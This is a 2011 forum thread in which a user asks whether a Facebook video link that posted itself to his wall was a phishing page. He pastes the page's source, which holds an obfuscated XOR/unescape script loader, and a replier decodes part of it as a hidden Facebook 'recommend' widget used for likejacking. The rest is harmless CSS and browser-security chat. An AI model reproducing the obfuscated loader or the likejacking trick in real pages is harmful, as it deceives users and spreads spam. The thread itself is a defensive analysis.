Author Topic: have i been phished? need help with javascript  (Read 2687 times)

0 Members and 1 Guest are viewing this topic.

Offline speakeasy

  • Thread Starter
  • Posts: 181
have i been phished? need help with javascript
« on: Sun, 13 March 2011, 23:04:13 »
So I'm on facebook, and I see a link to a video from my friend. I click on it, and instead of going straight to youtube, it goes to some strange site with an image of the video, then redirects me to the video on youtube, and somehow a link to the video gets pasted to my wall.

I checked out the code to the page http://ilikeitvery.hostoi.com/7.htm (note, i don't recommend clicking on it if you're logged onto facebook just to be safe), and it looks like this:

Code: [Select]
<!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;>
<!--hppage status=&quot;protected&quot;-->
<html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;
      xmlns:og=&quot;http://ogp.me/ns#&quot;
      xmlns:fb=&quot;http://www.facebook.com/2008/fbml&quot;>
<head><meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot;><SCRIPT LANGUAGE=&quot;JavaScript&quot;><!--
document.write(unescape(&quot;%3C%53%43%52%49%50%54%20%4C%41%4E%47%55%41%47%45%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%3C%21%2D%2D%0D%0A%68%70%5F%6F%6B%3D%74%72%75%65%3B%66%75%6E%63%74%69%6F%6E%20%68%70%5F%64%30%32%28%73%29%7B%69%66%28%21%68%70%5F%6F%6B%29%72%65%74%75%72%6E%3B%76%61%72%20%6F%3D%22%22%2C%61%72%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6F%73%3D%22%22%2C%69%63%3D%30%2C%70%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%63%3D%63%5E%28%28%70%2B%2B%25%38%29%2B%31%29%3B%6F%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%6F%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%61%72%5B%69%63%2B%2B%5D%3D%6F%73%3B%6F%73%3D%22%22%7D%7D%6F%3D%61%72%2E%6A%6F%69%6E%28%22%22%29%2B%6F%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%6F%29%7D%2F%2F%2D%2D%3E%3C%2F%53%43%52%49%50%54%3E&quot;));//--></SCRIPT><SCRIPT LANGUAGE=&quot;JavaScript&quot;><!--
hp_d02(&quot;=Q@VLVS(MCMCPG@M\x3C IesgTksksp'8;),/csikuklj\x25nwWbo+-~tb|tpm$cgk{d\x7Feqkesanl#luYjl)g*\x7Fhgd5ocumbgsgs,vw`tFodlw*lhcmyMe,\x22Kfk&+\x229(7\x3Cag\x22+`jeredlw*djk!zke,`pbfu,aqqrhf\x3C?1xy.jib$\x25,`pbfu,`pwjLmx~\x7Fasci|/if}Ficm\x3C?:5,/.ssgwqwh'n`npax{bdrgxmc.b&vjjgm;:;}~+ide!.)g-ijbnnhgqw8;5t}g-gqtkCd{*-,}umuwqj\x25`fdrg~yxoa ocumbgsgs,btuHfed,jjac\x7FGg*$Mkrbzogw$@~wdnpfv\x22/:5,3\x7Fx-hf~hebpjt)}rgqEbci|/km``~Hn)\x25NWLC ! ?.5# cgbwnakr)imn-h`h`|i#>4,/|ag*gkfsjmov-eij.slc`9kgqafcwkw(r{dpBc`hs&hlga}Ia &Obg\x22/&5,38r`ttanl>tdttmGnleq. 8&)meso`iumq*pubz@efjq(t}cqwv-hf~hebpjt)}rgqEbci|/km``~Hn)\x25NWLC !*7*(46.3hd+\x25hgd.'tfvvohf?6*\x7Faid}lgmp+iiknlwa}rjmow>luYde|gow`}cgbwnakr)goolqvccgvl>luYjl:flgpkbfu,ljnc~lnum9mvXee\x7F~aiub(hd+`jeredlw*ig~msq*\x7Froilnu-gdvs}sgFr`hs{)Guakr)ENWPAAIPF}Guakr)enfjblcu{}Guakr)CD[GKRH.3vkm`jq)goolqvccgvl>luYjl:ujjaip&nlha|bh\x7Fo?ktZkcudnpa\x25oa em`qhci|/efp@jbedlwF|Oc.'#gkfsjmov-eij.sem`qhci|/mmgjhsmyvnaks:`q]`ix{nn)flgpkbfu,VVI(nfeg{Kc.\x25nhnf>'/&5,3*\x7FmvXgj?eeiub3vkm`jq)dnabplii5#cakpr=jmcmo'{a}oawmjh'`q]mhv..svkm`jq){ucwqv;\x25*:pfppti(upvax`rfbvjkk&ox^lowi..sir\x5Cjiu/!:qfpQojmnww,'nwWonph-/\x25$02*yl`/lnavi`hs&mczawu.lnavi`hs&bcspptbMwgmpv.B~dlw*HIR[DMUAWzB~dlw*HIR[DMVP,=cgbwnakr)goolqvch~dp>luYidr9gkfsjmov-kkkh}rglqq;ox^low>nwWonph-/\x3Cntl`plii(ir\x5Cjab/!zpfppti(gcow`{cgbwnakr)gofqebusisv>luYile9jb-hf~hebpjt)iqrMehc)aoff|J`//Hlwawhb|!G{tiiums\x25*\x258+6.'*meso`iumq*pubz@efjq(nfeg{Kc. ERKF#,;:\x250~\x7F`jeredlw*djk&mgmcqn:51+*luYhc\x3Cdbhvc\x3Cag*gkfsjmov-eij.lnavi`hs&vpjp`. 4mkmo\x25tbd\x3Cqw}ict`dgw$q\x7Fwm\x3C wa}r(krq!$mtbn\x3C ktZhrdm,`wv$9/(9,+(+94.Q@VLVS6&quot;);//--></SCRIPT>


<meta property=&quot;og:title&quot; content=&quot;Watch how people react to a a little girl in white, left in a hotel corridor&quot; />
<meta property=&quot;og:description&quot; content=&quot;its so&#65279; ****in funny xDDDDDDDDDDDDDD&quot;/>  
<meta property=&quot;og:image&quot; content=&quot;http://ilikeitvery.hostoi.com/7.jpg&quot; />
<title>Video</title>
</head>
<BODY><SCRIPT LANGUAGE=&quot;JavaScript&quot;><!--
hp_d02(&quot;=Q@VLVS(MCMCPG@M\x3C IesgTksksp'8;),/l`/f`tjcdrhz/wpawG`mov-mkbbpNd+#Bcdcn\x25*\x258+6.'lbrlaf|np-qvcuIfgmp+oildzLb-!L@UOO#,;:\x250+x`jeredlw*rtn|d*$8aoq(rvzh`;\x25xnqjplii2``pkissm:nfbq\x3C*9123t}=sgq8.5567xy =8lk`(rp`9'e='ir\x5Cjpjk&fke&\x25qnluj>&5$'`dkdlq;\x258#\x3C?+aoq6&+~+*+*6=-PGWOW\x5C?&quot;);//--></SCRIPT><SCRIPT LANGUAGE=&quot;JavaScript&quot;><!--
hp_d02(&quot;=`l`|&eobmokw;\x25+92;4=6\x256?`lp'ae?!rlbbgmkmo'&t|xnf9'vh{hvjkk\x3C'icqlhprb3!vlt?7wp:\x22oacr=9qz8$\x7F+nfeg{>4$94hdqehc'|hvoa8$Qaegl&\x25uuk\x3C kpqv='.uts+\x7Fh}uwaa+ehe.gnf`b(_J6Mava@jnK\x3Cshicm\x3Cvqekuwisgmp'&tksmohlh`5#ll&\x25`uilgakwbbz\x3C 3&\x25qnluj>&327*!jfmbns5#1:4'&t|xnf9'dhzegq>kiim: =8*oaz`of:9)caw\x3C9bn~!kg9'usisv!$vr~dd?!kugdau{9$5='nhnwaw\x3C'Imrke-Iwibkw}86.3!rlwlrngo8#eguhdtvf?\x25jbnu82t}='|nr95u~\x3C(vkgpm\x3C081r{?\x25nbafjw>067xy9#~(oildz96'8;ale#wwe:*rvbvq(`ag =8*bn~?\x098aoq(hf>&ujfq#\x22pp|jb5#rlwlrngo8#eguhdtvf?\x25jbnu82t}='|nr9731wp:\x22y)lhcmy80&\x25iiEnwpaJpbz\x3C gkfsjmov-c`rBddofjqD~Ae*$hlmb/(,pp|jb&ekptig~5&`okfm 3rgwPlkbgtv+bphd|hmm,,}paofls+jhk`vjkk; `uvs>*)p\x7Fv,zkprrjd,`kh)piuak;s;PC5LfwbAegH\x258y)5781+8&;:nef\x22pvf;\x25xmcz*boa*?>,`lp9>gms&nl\x3C omnc\x25(rvzh`;\x25gqc`mq\x7F=(19#bljsms8#Eivoi)Msefosq\x3C2*?\x25vh{hvjkk\x3C'icqlhprb3!nfbq\x3C*98r{?\x25rhx;153u~\x3C(ekptig~2omma>&}\x25hlga}\x3C3*?&quot;);//--></SCRIPT><SCRIPT LANGUAGE=&quot;JavaScript&quot;><!--
hp_d02(&quot;=q`vlvs(rp`9'ns|q8,+fiifdaw*cgdmcmlo+hb|.gm[PU(imn-nv\x25\x7Fncoo94$94.q`vlvs6&quot;);//--></SCRIPT><SCRIPT LANGUAGE=&quot;JavaScript&quot;><!--
hp_d02(&quot;=da>iolm!jqac;\x25`uvs>*)ndhifmqpbzx,kkvrha/ali*1)`uo!$ig~gtv>&gss|nl\x5Cgjsi|#\x22tmaro5#33&\x25gd|hmm9'tbknonakb\x256=-ef?jncd\x3C?+aoq6?+gicq?&quot;);//--></SCRIPT></BODY>

</html>

Very weird. I used an unobfuscator and came up with this:

Code: [Select]
"));//-->

 

Video




Still pretty unreadable. Anyone know how I can figure out what this code actually does?
[sigpic][/sigpic]
PiaNoppoo Choc Mini 茶轴

PUNCH THE KEYS FOR GOD\'S SAKE!

Offline kps

  • Posts: 410
have i been phished? need help with javascript
« Reply #1 on: Mon, 14 March 2011, 09:34:57 »
It seems that what you've pasted is corrupted, maybe because the 'code' tags didn't preserve everything correctly. The last two little segments do this:

Code: [Select]
<script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;></script>
<fb:like href=&quot;http://ilikeitvery.hostoi.com/7.htm&quot; layout=&quot;button_count&quot; width=&quot;10&quot; action=&quot;recommend&quot;></fb:like>


which is how it ended up on your Facebook page (and presumably, how it ended up on the page you saw it on).

What the earlier, bigger segments do might be more interesting. If you make the original available as a file, or perhaps with something like pastebin, I may be able to tell you.

Offline speakeasy

  • Thread Starter
  • Posts: 181
have i been phished? need help with javascript
« Reply #2 on: Tue, 15 March 2011, 03:30:44 »
Quote from: kps;311517
It seems that what you've pasted is corrupted, maybe because the 'code' tags didn't preserve everything correctly. The last two little segments do this:

Code: [Select]
<script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;></script>
<fb:like href=&quot;http://ilikeitvery.hostoi.com/7.htm&quot; layout=&quot;button_count&quot; width=&quot;10&quot; action=&quot;recommend&quot;></fb:like>


which is how it ended up on your Facebook page (and presumably, how it ended up on the page you saw it on).

What the earlier, bigger segments do might be more interesting. If you make the original available as a file, or perhaps with something like pastebin, I may be able to tell you.


I just went to the link that I posted and viewed the source with firefox from the view menu. I also checked out the CSS and a lot of it was hiding links and graphics from facebook. I'm guessing it's one of those things that's built into the facebook platform for posting external content to your profile and the maker of that page is just abusing it?

Code: [Select]
.fb_hidden {
    position: absolute;
    top: -10000px;
    z-index: 10001;
}
.fb_reset {
    background: none repeat scroll 0 0 transparent;
    border: 0 none;
    border-spacing: 0;
    color: #000000;
    cursor: auto;
    direction: ltr;
    font-family: "lucida grande",tahoma,verdana,arial,sans-serif;
    font-size: 11px;
    font-style: normal;
    font-variant: normal;
    font-weight: normal;
    letter-spacing: normal;
    line-height: 1;
    margin: 0;
    overflow: visible;
    padding: 0;
    text-align: left;
    text-decoration: none;
    text-indent: 0;
    text-shadow: none;
    text-transform: none;
    visibility: visible;
    white-space: normal;
    word-spacing: normal;
}
.fb_link img {
    border: medium none;
}
.fb_dialog {
    position: absolute;
    top: -10000px;
    z-index: 10001;
}
.fb_dialog_advanced {
    -moz-border-radius: 8px 8px 8px 8px;
    background: none repeat scroll 0 0 rgba(82, 82, 82, 0.7);
    padding: 10px;
}
.fb_dialog_content {
    background: none repeat scroll 0 0 #FFFFFF;
    color: #333333;
}
.fb_dialog_close_icon {
    background: url("http://static.ak.fbcdn.net/rsrc.php/zq/r/IE9JII6Z1Ys.png") no-repeat scroll 0 0 transparent;
    cursor: pointer;
    display: block;
    height: 15px;
    position: absolute;
    right: 18px;
    top: 17px;
    width: 15px;
}
.fb_dialog_close_icon:hover {
    background: url("http://static.ak.fbcdn.net/rsrc.php/zq/r/IE9JII6Z1Ys.png") no-repeat scroll 0 -15px transparent;
}
.fb_dialog_close_icon:active {
    background: url("http://static.ak.fbcdn.net/rsrc.php/zq/r/IE9JII6Z1Ys.png") no-repeat scroll 0 -30px transparent;
}
.fb_dialog_loader {
    background-color: #F2F2F2;
    border: 1px solid #606060;
    font-size: 24px;
    padding: 20px;
}
.fb_dialog_top_left, .fb_dialog_top_right, .fb_dialog_bottom_left, .fb_dialog_bottom_right {
    height: 10px;
    overflow: hidden;
    position: absolute;
    width: 10px;
}
.fb_dialog_top_left {
    background: url("http://static.ak.fbcdn.net/rsrc.php/ze/r/8YeTNIlTZjm.png") no-repeat scroll 0 0 transparent;
    left: -10px;
    top: -10px;
}
.fb_dialog_top_right {
    background: url("http://static.ak.fbcdn.net/rsrc.php/ze/r/8YeTNIlTZjm.png") no-repeat scroll 0 -10px transparent;
    right: -10px;
    top: -10px;
}
.fb_dialog_bottom_left {
    background: url("http://static.ak.fbcdn.net/rsrc.php/ze/r/8YeTNIlTZjm.png") no-repeat scroll 0 -20px transparent;
    bottom: -10px;
    left: -10px;
}
.fb_dialog_bottom_right {
    background: url("http://static.ak.fbcdn.net/rsrc.php/ze/r/8YeTNIlTZjm.png") no-repeat scroll 0 -30px transparent;
    bottom: -10px;
    right: -10px;
}
.fb_dialog_vert_left, .fb_dialog_vert_right, .fb_dialog_horiz_top, .fb_dialog_horiz_bottom {
    background: none repeat scroll 0 0 #525252;
    opacity: 0.7;
    position: absolute;
}
.fb_dialog_vert_left, .fb_dialog_vert_right {
    height: 100%;
    width: 10px;
}
.fb_dialog_vert_left {
    margin-left: -10px;
}
.fb_dialog_vert_right {
    margin-right: -10px;
    right: 0;
}
.fb_dialog_horiz_top, .fb_dialog_horiz_bottom {
    height: 10px;
    width: 100%;
}
.fb_dialog_horiz_top {
    margin-top: -10px;
}
.fb_dialog_horiz_bottom {
    bottom: 0;
    margin-bottom: -10px;
}
.fb_dialog_iframe {
    line-height: 0;
}
.fb_dialog_content .dialog_title {
    background: none repeat scroll 0 0 #6D84B4;
    border: 1px solid #3B5998;
    color: #FFFFFF;
    font-size: 14px;
    font-weight: bold;
    margin: 0;
}
.fb_dialog_content .dialog_title > span {
    background: url("http://static.ak.fbcdn.net/rsrc.php/zd/r/Cou7n-nqK52.gif") no-repeat scroll 5px 50% transparent;
    float: left;
    padding: 5px 0 7px 26px;
}
.fb_dialog_content .dialog_content {
    background: url("http://static.ak.fbcdn.net/rsrc.php/z9/r/jKEcVPZFk-2.gif") no-repeat scroll 50% 50% transparent;
    border-color: -moz-use-text-color #555555;
    border-left: 1px solid #555555;
    border-right: 1px solid #555555;
    border-style: none solid;
    border-width: 0 1px;
    height: 150px;
}
.fb_dialog_content .dialog_footer {
    background: none repeat scroll 0 0 #F2F2F2;
    border-color: #CCCCCC #555555 #555555;
    border-right: 1px solid #555555;
    border-style: solid;
    border-width: 1px;
    height: 40px;
}
#fb_dialog_loader_close {
    float: right;
}
.fb_iframe_widget {
    display: inline-block;
    position: relative;
}
.fb_iframe_widget iframe {
    position: relative;
    vertical-align: text-bottom;
}
.fb_iframe_widget span {
    position: relative;
}
.fb_hide_iframes iframe {
    left: -10000px;
    position: relative;
}
.fb_iframe_widget_loader {
    display: inline-block;
    position: relative;
}
.fb_iframe_widget_loader iframe {
    min-height: 32px;
    z-index: 2;
}
.fb_iframe_widget_loader .FB_Loader {
    background: url("http://static.ak.fbcdn.net/rsrc.php/z9/r/jKEcVPZFk-2.gif") no-repeat scroll 0 0 transparent;
    height: 32px;
    left: 50%;
    margin-left: -16px;
    position: absolute;
    width: 32px;
    z-index: 4;
}
.fb_button_simple, .fb_button_simple_rtl {
    background-image: url("http://static.ak.fbcdn.net/rsrc.php/zH/r/eIpbnVKI9lR.png");
    background-repeat: no-repeat;
    cursor: pointer;
    outline: medium none;
    text-decoration: none;
}
.fb_button_simple_rtl {
    background-position: right 0;
}
.fb_button_simple .fb_button_text {
    margin: 0 0 0 20px;
    padding-bottom: 1px;
}
.fb_button_simple_rtl .fb_button_text {
    margin: 0 10px 0 0;
}
a.fb_button_simple:hover .fb_button_text, a.fb_button_simple_rtl:hover .fb_button_text, .fb_button_simple:hover .fb_button_text, .fb_button_simple_rtl:hover .fb_button_text {
    text-decoration: underline;
}
.fb_button, .fb_button_rtl {
    background: url("http://static.ak.fbcdn.net/rsrc.php/zL/r/FGFbc80dUKj.png") no-repeat scroll 0 0 #29447E;
    cursor: pointer;
    display: inline-block;
    outline: medium none;
    padding: 0 0 0 1px;
    text-decoration: none;
}
.fb_button .fb_button_text, .fb_button_rtl .fb_button_text {
    background: url("http://static.ak.fbcdn.net/rsrc.php/zL/r/FGFbc80dUKj.png") repeat scroll 0 0 #5F78AB;
    border-bottom: 1px solid #1A356E;
    border-top: 1px solid #879AC0;
    color: #FFFFFF;
    display: block;
    font-family: "lucida grande",tahoma,verdana,arial,sans-serif;
    font-weight: bold;
    margin: 1px 1px 0 21px;
    padding: 2px 6px 3px;
    text-shadow: none;
}
a.fb_button, a.fb_button_rtl, .fb_button, .fb_button_rtl {
    text-decoration: none;
}
a.fb_button:active .fb_button_text, a.fb_button_rtl:active .fb_button_text, .fb_button:active .fb_button_text, .fb_button_rtl:active .fb_button_text {
    background: none repeat scroll 0 0 #4F6AA3;
    border-bottom: 1px solid #29447E;
    border-top: 1px solid #45619D;
    text-shadow: none;
}
.fb_button_xlarge, .fb_button_xlarge_rtl {
    background-position: left -60px;
    font-size: 24px;
    line-height: 30px;
}
.fb_button_xlarge .fb_button_text {
    margin-left: 38px;
    padding: 3px 8px 3px 12px;
}
a.fb_button_xlarge:active {
    background-position: left -99px;
}
.fb_button_xlarge_rtl {
    background-position: right -268px;
}
.fb_button_xlarge_rtl .fb_button_text {
    margin-right: 39px;
    padding: 3px 8px 3px 12px;
}
a.fb_button_xlarge_rtl:active {
    background-position: right -307px;
}
.fb_button_large, .fb_button_large_rtl {
    background-position: left -138px;
    font-size: 13px;
    line-height: 16px;
}
.fb_button_large .fb_button_text {
    margin-left: 24px;
    padding: 2px 6px 4px;
}
a.fb_button_large:active {
    background-position: left -163px;
}
.fb_button_large_rtl {
    background-position: right -346px;
}
.fb_button_large_rtl .fb_button_text {
    margin-right: 25px;
}
a.fb_button_large_rtl:active {
    background-position: right -371px;
}
.fb_button_medium, .fb_button_medium_rtl {
    background-position: left -188px;
    font-size: 11px;
    line-height: 14px;
}
a.fb_button_medium:active {
    background-position: left -210px;
}
.fb_button_medium_rtl {
    background-position: right -396px;
}
.fb_button_text_rtl, .fb_button_medium_rtl .fb_button_text {
    margin-right: 22px;
    padding: 2px 6px 3px;
}
a.fb_button_medium_rtl:active {
    background-position: right -418px;
}
.fb_button_small, .fb_button_small_rtl {
    background-position: left -232px;
    font-size: 10px;
    line-height: 10px;
}
.fb_button_small .fb_button_text {
    margin-left: 17px;
    padding: 2px 6px 3px;
}
a.fb_button_small:active, .fb_button_small:active {
    background-position: left -250px;
}
.fb_button_small_rtl {
    background-position: right -440px;
}
.fb_button_small_rtl .fb_button_text {
    margin-right: 18px;
    padding: 2px 6px;
}
a.fb_button_small_rtl:active {
    background-position: right -458px;
}
.fb_share_count_wrapper {
    float: left;
    position: relative;
}
.fb_share_count {
    background: none repeat scroll 0 0 #B0B9EC;
    color: #333333;
    font-family: "lucida grande",tahoma,verdana,arial,sans-serif;
    text-align: center;
}
.fb_share_count_inner {
    background: none repeat scroll 0 0 #E8EBF2;
    display: block;
}
.fb_share_count_right {
    display: inline-block;
    margin-left: -1px;
}
.fb_share_count_right .fb_share_count_inner {
    border-bottom: 1px solid #B0B9EC;
    border-top: 1px solid #E8EBF2;
    font-size: 10px;
    font-weight: bold;
    line-height: 10px;
    margin: 1px 1px 0;
    padding: 2px 6px 3px;
}
.fb_share_count_top {
    border: 1px solid #B0B9EC;
    display: block;
    font-size: 22px;
    letter-spacing: -1px;
    line-height: 34px;
    margin-bottom: 7px;
}
.fb_share_count_nub_top {
    background-image: url("http://static.ak.fbcdn.net/rsrc.php/zU/r/bSOHtKbCGYI.png");
    background-repeat: no-repeat;
    border: medium none;
    display: block;
    height: 7px;
    left: 7px;
    margin: 0;
    padding: 0;
    position: absolute;
    top: 35px;
    width: 6px;
}
.fb_share_count_nub_right {
    background-image: url("http://static.ak.fbcdn.net/rsrc.php/zX/r/i_oIVTKMYsL.png");
    background-position: right 5px;
    background-repeat: no-repeat;
    border: medium none;
    display: inline-block;
    height: 10px;
    left: 2px;
    margin: 0 2px 0 0;
    padding: 0;
    position: relative;
    vertical-align: top;
    width: 5px;
    z-index: 10;
}
.fb_share_no_count {
    display: none;
}
.fb_share_size_Small .fb_share_count_right .fb_share_count_inner {
    font-size: 10px;
}
.fb_share_size_Medium .fb_share_count_right .fb_share_count_inner {
    font-size: 11px;
    letter-spacing: -1px;
    line-height: 14px;
    padding: 2px 6px 3px;
}
.fb_share_size_Large .fb_share_count_right .fb_share_count_inner {
    font-size: 13px;
    font-weight: normal;
    letter-spacing: -1px;
    line-height: 16px;
    padding: 2px 6px 4px;
}
.fb_share_count_hidden .fb_share_count_nub_top, .fb_share_count_hidden .fb_share_count_top, .fb_share_count_hidden .fb_share_count_nub_right, .fb_share_count_hidden .fb_share_count_right {
    visibility: hidden;
}
.fb_connect_bar_container div, .fb_connect_bar_container span, .fb_connect_bar_container a, .fb_connect_bar_container img, .fb_connect_bar_container strong {
    background: none repeat scroll 0 0 transparent;
    border: 0 none;
    border-spacing: 0;
    direction: ltr;
    font-style: normal;
    font-variant: normal;
    letter-spacing: normal;
    line-height: 1;
    margin: 0;
    overflow: visible;
    padding: 0;
    text-align: left;
    text-decoration: none;
    text-indent: 0;
    text-shadow: none;
    text-transform: none;
    vertical-align: baseline;
    visibility: visible;
    white-space: normal;
    word-spacing: normal;
}
.fb_connect_bar_container {
    background: none repeat scroll 0 0 #3B5998 !important;
    border-bottom: 1px solid #333333 !important;
    height: 42px !important;
    left: 0 !important;
    margin: 0 !important;
    overflow: hidden !important;
    padding: 0 25px !important;
    position: fixed;
    right: 0 !important;
    vertical-align: middle !important;
    z-index: 99999999 !important;
}
.fb_connect_bar_container_ie6 {
    position: absolute;
}
.fb_connect_bar {
    background: none repeat scroll 0 0 transparent;
    color: #FFFFFF !important;
    font-family: "lucida grande",tahoma,verdana,arial,sans-serif !important;
    font-size: 13px !important;
    font-style: normal !important;
    font-variant: normal !important;
    font-weight: normal !important;
    height: 100%;
    letter-spacing: normal !important;
    line-height: 1 !important;
    margin: auto;
    padding: 6px 0 0 !important;
    position: relative;
    text-decoration: none !important;
    text-indent: 0 !important;
    text-shadow: none !important;
    text-transform: none !important;
    white-space: normal !important;
    width: 100%;
    word-spacing: normal !important;
}
.fb_connect_bar a:hover {
    color: #FFFFFF;
}
.fb_connect_bar .fb_profile img {
    height: 30px;
    margin: 0 6px 5px 0;
    vertical-align: middle;
    width: 30px;
}
.fb_connect_bar div a, .fb_connect_bar span, .fb_connect_bar span a {
    color: #BAC6DA;
    font-size: 11px;
    text-decoration: none;
}
.fb_connect_bar .fb_buttons {
    float: right;
    margin-top: 7px;
}
.fb_edge_widget_with_comment {
    position: relative;
}
.fb_edge_widget_with_comment span.fb_edge_comment_widget {
    position: absolute;
}
.fb_edge_widget_with_comment span.fb_edge_comment_widget iframe.fb_ltr {
    left: -4px;
}
.fb_edge_widget_with_comment span.fb_edge_comment_widget iframe.fb_rtl {
    left: 2px;
}
.fb_edge_widget_with_comment span.fb_send_button_form_widget {
    left: 0;
}
.fb_edge_widget_with_comment span.fb_send_button_form_widget .FB_Loader {
    left: 10%;
}
#fb_social_bar_container {
    height: 34px;
    left: 0;
    padding: 0 25px;
    position: fixed;
    right: 0;
    z-index: 999999999;
}
.fb_social_bar_iframe {
    float: right;
    opacity: 0;
    position: relative;
}
.fb_social_bar_iframe_bottom_ie6 {
    bottom: auto;
}
.fb_social_bar_iframe_top_ie6 {
    bottom: auto;
}
[sigpic][/sigpic]
PiaNoppoo Choc Mini 茶轴

PUNCH THE KEYS FOR GOD\'S SAKE!

Offline kps

  • Posts: 410
have i been phished? need help with javascript
« Reply #3 on: Tue, 15 March 2011, 09:39:50 »
That's just decorative; although it may help imitate a facebook page, it doesn't do anything itself. The 'interesting' parts — whatever this page is trying to do other than just 'like' itself — would be in the first three hp_d02 lines, which don't seem to be reproduced correctly here.

Offline Fwiffo

  • Posts: 358
have i been phished? need help with javascript
« Reply #4 on: Tue, 15 March 2011, 09:47:48 »
You should use a whitelist system to block malicious javascript, like the noscript plugin for Firefox. I don't know why such features aren't standard win web browsers considering all the security problems caused by javascript, plugins, etc.
You can call me... Keyboard Otaku... or not quite...

Offline BucklingSpring

  • Posts: 1613
have i been phished? need help with javascript
« Reply #5 on: Tue, 15 March 2011, 10:07:43 »
Quote from: Fwiffo;312089
You should use a whitelist system to block malicious javascript, like the noscript plugin for Firefox. I don't know why such features aren't standard win web browsers considering all the security problems caused by javascript, plugins, etc.


Nowadays I no longer know which one is more efficient. Whitelist or blacklist. IE-SpyAd was good blacklist, but it is no longer maintained.

TeaTimer part of spybot S&D can protect your browser from alot of malicious apps.

I now have two setups... Safe and not-sure. All not-sure activities are done in a sandbox. I use BufferZone PRO from Trustware. It doesn't prevent anything. But whatever occures stays within the boundaries of the sandbox. You are one click away to clean any mess caused by a malware.


What The F... And it is now free for home use!!!!!
Bufferzone is now FREE
In memory of smallfry 1996-2013
Boards I own, click ->
More
Ducky x2 (9008G2 Pro PBT/MX Green and Mini MX Red), Matias x2 (QP and Mini QP Dampened ALPS), Topre RealForce x4 (87U 55g/Digilog case, 103U-UW & 104UG High-Profile x2), Filco Majestouch x2 (TKL MX Blue & V2 AI 104 MX Blue), IBM-M x2 (BS & RD), Unicomp-M x5 (BS black on black x2, BS Ivory x2, QT Ultra-Classic), Deck x4 (Legend MX Black & MX Clear, Hassium & Francium w/ MX Brown), DAS III (MX Blue), KBT Pure Pro 60% (MX Red), NMB-RT8256CW+ x2 (black space invader), XArmor U9BL-S (MX Brown) given for free to someone I hate, CM X2 (Trigger/MX Green + Storm TKL/NovaTouch), TVS GOLD (MX Blue) and a many many more (NMB, DELL, MS, ATT, KeyTronic, Etc...)

Offline Fwiffo

  • Posts: 358
have i been phished? need help with javascript
« Reply #6 on: Tue, 15 March 2011, 10:21:36 »
The default behavior should be "no trust." 90% of sites mostly work (or work better) with no javascript. If a site doesn't work, I can enable it on per-domain basis, if I trust the site. It also prevents loading of hundreds stupid externals javascript widgets, flash ads, etc. so I can browse the web twice as fast, and don't have to worry about flash banner ads crashing my browser, etc.
You can call me... Keyboard Otaku... or not quite...

Offline BucklingSpring

  • Posts: 1613
have i been phished? need help with javascript
« Reply #7 on: Tue, 15 March 2011, 10:38:01 »
Quote from: Fwiffo;312099
The default behavior should be "no trust." 90% of sites mostly work (or work better) with no javascript. If a site doesn't work, I can enable it on per-domain basis, if I trust the site. It also prevents loading of hundreds stupid externals javascript widgets, flash ads, etc. so I can browse the web twice as fast, and don't have to worry about flash banner ads crashing my browser, etc.


LoL... Have you tried Lynx - the ultimate TEXT Browser

Can't go faster than that.
In memory of smallfry 1996-2013
Boards I own, click ->
More
Ducky x2 (9008G2 Pro PBT/MX Green and Mini MX Red), Matias x2 (QP and Mini QP Dampened ALPS), Topre RealForce x4 (87U 55g/Digilog case, 103U-UW & 104UG High-Profile x2), Filco Majestouch x2 (TKL MX Blue & V2 AI 104 MX Blue), IBM-M x2 (BS & RD), Unicomp-M x5 (BS black on black x2, BS Ivory x2, QT Ultra-Classic), Deck x4 (Legend MX Black & MX Clear, Hassium & Francium w/ MX Brown), DAS III (MX Blue), KBT Pure Pro 60% (MX Red), NMB-RT8256CW+ x2 (black space invader), XArmor U9BL-S (MX Brown) given for free to someone I hate, CM X2 (Trigger/MX Green + Storm TKL/NovaTouch), TVS GOLD (MX Blue) and a many many more (NMB, DELL, MS, ATT, KeyTronic, Etc...)

Offline Fwiffo

  • Posts: 358
have i been phished? need help with javascript
« Reply #8 on: Tue, 15 March 2011, 11:00:38 »
I actually use lynx all the time, at least, when I'm not using wget.
You can call me... Keyboard Otaku... or not quite...

Offline BucklingSpring

  • Posts: 1613
have i been phished? need help with javascript
« Reply #9 on: Tue, 15 March 2011, 11:08:50 »
Quote from: Fwiffo;312116
I actually use lynx all the time, at least, when I'm not using wget.


Cool! Can you remind me how to enable mouse use on Win32?

When I enable the mouse, I get it in "select/insert" mode only.
In memory of smallfry 1996-2013
Boards I own, click ->
More
Ducky x2 (9008G2 Pro PBT/MX Green and Mini MX Red), Matias x2 (QP and Mini QP Dampened ALPS), Topre RealForce x4 (87U 55g/Digilog case, 103U-UW & 104UG High-Profile x2), Filco Majestouch x2 (TKL MX Blue & V2 AI 104 MX Blue), IBM-M x2 (BS & RD), Unicomp-M x5 (BS black on black x2, BS Ivory x2, QT Ultra-Classic), Deck x4 (Legend MX Black & MX Clear, Hassium & Francium w/ MX Brown), DAS III (MX Blue), KBT Pure Pro 60% (MX Red), NMB-RT8256CW+ x2 (black space invader), XArmor U9BL-S (MX Brown) given for free to someone I hate, CM X2 (Trigger/MX Green + Storm TKL/NovaTouch), TVS GOLD (MX Blue) and a many many more (NMB, DELL, MS, ATT, KeyTronic, Etc...)

Offline Fwiffo

  • Posts: 358
have i been phished? need help with javascript
« Reply #10 on: Tue, 15 March 2011, 11:16:32 »
I dunno. I use it in linux.
You can call me... Keyboard Otaku... or not quite...